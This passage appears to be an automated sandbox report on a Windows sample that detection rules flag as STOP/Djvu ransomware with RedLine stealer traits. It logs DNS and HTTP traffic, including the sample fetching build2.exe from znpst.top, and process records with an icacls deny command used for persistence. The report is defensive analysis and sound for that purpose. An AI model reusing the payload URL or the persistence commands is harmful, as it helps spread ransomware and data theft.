              Aug 13, 2024 21:59:02.266727924 CEST4970680192.168.2.592.246.89.93
              Aug 13, 2024 21:59:02.267004013 CEST4970680192.168.2.592.246.89.93
              Aug 13, 2024 21:59:02.272864103 CEST804970692.246.89.93192.168.2.5
              Aug 13, 2024 21:59:02.644750118 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:02.644794941 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:02.644881964 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:02.651169062 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:02.651184082 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.139090061 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.139244080 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.469418049 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.469444990 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.470581055 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.471997976 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.474189043 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.516500950 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.829174995 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.829241991 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.829258919 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.829310894 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.829317093 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.829353094 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.829392910 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:03.829441071 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.830061913 CEST49707443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:03.830080986 CEST44349707188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:11.734783888 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:11.734831095 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:11.734898090 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:11.743808031 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:11.743827105 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:12.206073046 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:12.206167936 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:12.210287094 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:12.210300922 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:12.210551023 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:12.210601091 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:12.217077017 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:12.260495901 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:12.799262047 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:12.799345970 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:12.799465895 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:12.799498081 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:12.801060915 CEST49708443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:12.801080942 CEST44349708188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:19.194107056 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:19.194148064 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:19.194231987 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:19.206351042 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:19.206370115 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:19.702876091 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:19.703030109 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:19.800821066 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:19.800846100 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:19.801827908 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:19.801902056 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:19.806329966 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:19.848505974 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:20.201138020 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:20.201277018 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:20.201400995 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:20.202142954 CEST49716443192.168.2.5188.114.96.3
              Aug 13, 2024 21:59:20.202164888 CEST44349716188.114.96.3192.168.2.5
              Aug 13, 2024 21:59:23.657293081 CEST804970692.246.89.93192.168.2.5
              Aug 13, 2024 21:59:23.657614946 CEST4970680192.168.2.592.246.89.93
              Aug 13, 2024 21:59:23.657833099 CEST4970680192.168.2.592.246.89.93
              Aug 13, 2024 21:59:23.662944078 CEST804970692.246.89.93192.168.2.5
              TimestampSource PortDest PortSource IPDest IP
              Aug 13, 2024 21:58:57.559046030 CEST6000153192.168.2.51.1.1.1
              Aug 13, 2024 21:58:57.569938898 CEST53600011.1.1.1192.168.2.5
              Aug 13, 2024 21:59:01.967299938 CEST5868553192.168.2.51.1.1.1
              Aug 13, 2024 21:59:01.967669010 CEST5916953192.168.2.51.1.1.1
              Aug 13, 2024 21:59:01.981290102 CEST53591691.1.1.1192.168.2.5
              Aug 13, 2024 21:59:02.259964943 CEST53586851.1.1.1192.168.2.5
              Aug 13, 2024 21:59:07.034843922 CEST5655253192.168.2.51.1.1.1
              Aug 13, 2024 21:59:07.054073095 CEST53565521.1.1.1192.168.2.5
              Aug 13, 2024 21:59:12.144876957 CEST4951953192.168.2.51.1.1.1
              Aug 13, 2024 21:59:12.174659967 CEST53495191.1.1.1192.168.2.5
              Aug 13, 2024 21:59:17.255332947 CEST6527253192.168.2.51.1.1.1
              Aug 13, 2024 21:59:17.390378952 CEST53652721.1.1.1192.168.2.5
              Aug 13, 2024 21:59:23.659478903 CEST5784353192.168.2.51.1.1.1
              Aug 13, 2024 21:59:23.684307098 CEST53578431.1.1.1192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Aug 13, 2024 21:58:57.559046030 CEST192.168.2.51.1.1.10x8c47Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
              Aug 13, 2024 21:59:01.967299938 CEST192.168.2.51.1.1.10x6d32Standard query (0)znpst.topA (IP address)IN (0x0001)false
              Aug 13, 2024 21:59:01.967669010 CEST192.168.2.51.1.1.10xb469Standard query (0)securebiz.orgA (IP address)IN (0x0001)false
              Aug 13, 2024 21:59:07.034843922 CEST192.168.2.51.1.1.10x4d8fStandard query (0)securebiz.orgA (IP address)IN (0x0001)false
              Aug 13, 2024 21:59:12.144876957 CEST192.168.2.51.1.1.10x3674Standard query (0)securebiz.orgA (IP address)IN (0x0001)false
              Aug 13, 2024 21:59:17.255332947 CEST192.168.2.51.1.1.10x663cStandard query (0)securebiz.orgA (IP address)IN (0x0001)false
              Aug 13, 2024 21:59:23.659478903 CEST192.168.2.51.1.1.10xfe76Standard query (0)securebiz.orgA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Aug 13, 2024 21:58:57.569938898 CEST1.1.1.1192.168.2.50x8c47No error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
              Aug 13, 2024 21:58:57.569938898 CEST1.1.1.1192.168.2.50x8c47No error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
              Aug 13, 2024 21:59:02.259964943 CEST1.1.1.1192.168.2.50x6d32No error (0)znpst.top92.246.89.93A (IP address)IN (0x0001)false
              • api.2ip.ua
              • znpst.top
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.54970692.246.89.93802684C:\Users\user\Desktop\C0XWmZAnYk.exe
              TimestampBytes transferredDirectionData
              Aug 13, 2024 21:59:02.267004013 CEST89OUTGET /dl/build2.exe HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: znpst.top


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.549704188.114.96.34433208C:\Users\user\Desktop\C0XWmZAnYk.exe
              TimestampBytes transferredDirectionData
              2024-08-13 19:58:58 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-08-13 19:58:58 UTC891INHTTP/1.1 200 OK
              Date: Tue, 13 Aug 2024 19:58:58 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpHdpz%2FZjX1sLwL1IpMuXXVC3Fwfu%2B5R7YjU%2FlBYKbgFYJRxMCsv2BbyUKhbf5%2B1a8gc3fjOn0JwC4hVX8Gez3KFkvcuddbVcMqJWyIe5stktG9smbVghlMyaDNv"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8b2b486ece5242e0-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-13 19:58:58 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-08-13 19:58:58 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.549705188.114.96.34432684C:\Users\user\Desktop\C0XWmZAnYk.exe
              TimestampBytes transferredDirectionData
              2024-08-13 19:59:01 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-08-13 19:59:01 UTC891INHTTP/1.1 200 OK
              Date: Tue, 13 Aug 2024 19:59:01 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Ro%2B%2FI4n3RCw4ZxI9n4MXQq3x5LLvNwIQXp8VPfzDRJByohuAFi9KGUZwqKjh%2B4IoDyWcsg%2B6b6rdNQwL1H7gcPPGQP0oYlFi75fpQfn2Ksl9oBAGp9qkn1oQ7BF"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8b2b4882ab51238a-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-13 19:59:01 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-08-13 19:59:01 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.549707188.114.96.34436776C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              TimestampBytes transferredDirectionData
              2024-08-13 19:59:03 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-08-13 19:59:03 UTC889INHTTP/1.1 200 OK
              Date: Tue, 13 Aug 2024 19:59:03 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8mT15taP6zOG1k1FLU3fFaKZzFOv9g70V7f5BM59YNY3CHhm7er2slX2qQIGlge7YTSClH7K%2FBXV8PnUk9B%2FYD0ShkYG1igaXHkH6BS5%2Ftq1YZ0iMu4h3X1R4p8k"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8b2b488f0f110f80-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-13 19:59:03 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-08-13 19:59:03 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.549708188.114.96.34436360C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              TimestampBytes transferredDirectionData
              2024-08-13 19:59:12 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-08-13 19:59:12 UTC893INHTTP/1.1 200 OK
              Date: Tue, 13 Aug 2024 19:59:12 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGNnxQSmZW5dsx8rfI5hw%2Bw%2BSuA52lc5YqsYSy%2BnhDZXh93Qkq27fgJW407vxbVmopR4upzdkWqINoiTjMp%2BuEX3o%2BaRu1Cl9vvOMdZTKngFb6n37BUszISyBuBR"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8b2b48c5d92419d7-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-13 19:59:12 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-08-13 19:59:12 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.549716188.114.96.34435260C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              TimestampBytes transferredDirectionData
              2024-08-13 19:59:19 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-08-13 19:59:20 UTC893INHTTP/1.1 200 OK
              Date: Tue, 13 Aug 2024 19:59:20 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FK6Ng0LUQon11DknQURDF7mM1k%2F%2F0oVkA%2F7PwLPiP7Zw89alHV6jztCj%2FSFFmjoEx5e60kMqkWTK4VRbpXJHdTQgZRxe4wNAbllDBaMlwACZjI3KZ0itzdC60ua"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8b2b48f54b5841b4-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-13 19:59:20 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-08-13 19:59:20 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:15:58:54
              Start date:13/08/2024
              Path:C:\Users\user\Desktop\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\C0XWmZAnYk.exe"
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:15:58:56
              Start date:13/08/2024
              Path:C:\Users\user\Desktop\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\C0XWmZAnYk.exe"
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:3
              Start time:15:58:57
              Start date:13/08/2024
              Path:C:\Windows\SysWOW64\icacls.exe
              Wow64 process (32bit):true
              Commandline:icacls "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Imagebase:0xcf0000
              File size:29'696 bytes
              MD5 hash:2E49585E4E08565F52090B144062F97E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:15:58:57
              Start date:13/08/2024
              Path:C:\Users\user\Desktop\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTask
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2081980325.0000000000A6D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:5
              Start time:15:58:58
              Start date:13/08/2024
              Path:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --Task
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2099680252.0000000000B79000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 87%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:6
              Start time:15:58:59
              Start date:13/08/2024
              Path:C:\Users\user\Desktop\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTask
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:7
              Start time:15:59:01
              Start date:13/08/2024
